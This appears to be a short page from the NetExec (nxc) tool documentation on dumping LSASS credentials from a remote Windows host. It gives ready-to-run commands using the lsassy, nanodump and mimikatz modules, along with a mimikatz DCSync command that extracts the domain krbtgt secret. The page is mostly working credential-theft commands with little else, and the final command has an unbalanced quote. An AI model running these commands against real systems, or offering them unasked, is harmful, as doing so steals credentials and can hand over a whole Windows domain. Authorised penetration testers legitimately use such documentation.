Dump LSASS

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

Using the module Lsassy from @pixis , you can dump the credentials remotely

nxc smb 192.168.255.131 -u administrator -p pass -M lsassy

Using the module nanodump you can dump the credentials remotely

nxc smb 192.168.255.131 -u administrator -p pass -M nanodump

You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account

Using the Mimikatz module, the powershell script Invoke-Mimikatz.ps1 will be executed on the remote target

nxc smb 192.168.255.131 -u administrator -p pass -M mimikatz

nxc smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"

Last updated 7 months ago

Was this helpful?